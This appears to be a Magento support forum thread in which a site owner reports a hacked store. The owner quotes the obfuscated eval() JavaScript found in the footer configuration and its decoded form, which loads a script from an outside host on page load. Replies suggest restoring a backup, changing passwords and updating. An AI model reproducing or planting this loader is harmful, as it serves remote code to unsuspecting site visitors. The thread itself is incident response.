Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

Magento site has been hacked. 
 
jackiee123
Jr. Member
 
Total Posts:  3
Joined:  2010-04-26
 

Hi, recently a site of mine have been compromised / hacked. Upon investigation i found that the malicious code was inserted in the footer.

Table: core_config_data
Row_ID: 33
path: design/footer/absolute_footer

Added js script in “System => Configuration =>general => Design => Footer => Miscellaneous HTML” parameter.

Following codes were found .

‹script language="javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!’’.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r

[e]}];e=function(){return’\\w+’};c=1};while(c--)if(k[c])p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c]);return p}(’2 1=\’\’;5{6 7(\’8\’)}9(e){1=3.a(\’f\’)}2 4=\’h\’+\’t\’+

\’t\’+\’p\’+\’:\’+\’/\’+\’/\’+\’c\’+\’l\’+\’i\’+\’i\’+\’k\’+\’.\’+\’c\’+\’o\’+\’.\’+\’u\’+\’k\’+\’/\’+\’b\’+\’l\’+\’o\’+\’g\’+\’/\’+\’w\’+\’p\’+\’-\’+\’i\’+\’n\’+\’c\’+\’l\’+

\’u\’+\’d\’+\’e\’+\’s\’+\’/\’+\’p\’+\’o\’+\’m\’+\’o\’+\’/\’+\’i\’+\’p\’+\’h\’+\’o\’+\’t\’+\’o\’+\’.\’+\’j\’+\’s\’;1.q(\’r\’,4);3.v(\’x\’).y(0).z(1);’,36,36,’|s00|var|document|

url|try|new|ActiveXObject|dc|catch|createElement|||||script|||||||||||setAttribute|src||||getElementsByTagName||head|item|appendChild’.split(’|’),0,{}))‹/script>

Decoded script:

var s00 = ‘’;
try {
new ActiveXObject(’dc’)
} catch(e) {
s00 = document.createElement(’script’)
}
var url = ‘h’ + ‘t’ + ‘t’ + ‘p’ + ‘:’ + ‘/’ + ‘/’ + ‘c’ + ‘l’ + ‘i’ + ‘i’ + ‘k’ + ‘.’ + ‘c’ + ‘o’ + ‘.’ + ‘u’ + ‘k’ + ‘/’ + ‘b’ + ‘l’ + ‘o’ + ‘g’ + ‘/’ + ‘w’ + ‘p’ + ‘-’ + ‘i’ + ‘n’ + ‘c’ + ‘l’ + ‘u’ + ‘d’ + ‘e’ + ‘s’ + ‘/’ + ‘p’ + ‘o’ + ‘m’ + ‘o’ + ‘/’ + ‘i’ + ‘p’ + ‘h’ + ‘o’ + ‘t’ + ‘o’ + ‘.’ + ‘j’ + ‘s’;
s00.setAttribute(’src’, url);
document.getElementsByTagName(’head’).item(0).appendChild(s00);

 
Magento Community Magento Community
Magento Community
Magento Community
 
Brynnae
Member
 
Avatar
Total Posts:  36
Joined:  2012-04-17
California
 

Do you have old backup without malicious code, then you can upload whole site. This is one of the way to remove or else if you think that removing code will be OK then you can remove the same code as you mentioned.

And after doing that you try to focus in increasing security of your website and try to find loop holes and close the same.

 
Magento Community Magento Community
Magento Community
Magento Community
 
thebod
Moderator
 
Avatar
Total Posts:  81
Joined:  2010-08-11
 

Hi,

I’m not able to access the JS anymore, might be an generic browser attacking toolkit.

Anyway, before checking for Magento issues, you should change all your passwords! In nearly every case Magento installations gets compromised by stolen passwords, not by issues inside Magento.

And do you use the most up-to-date Magento version? If not, I’d highly recommend an update.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top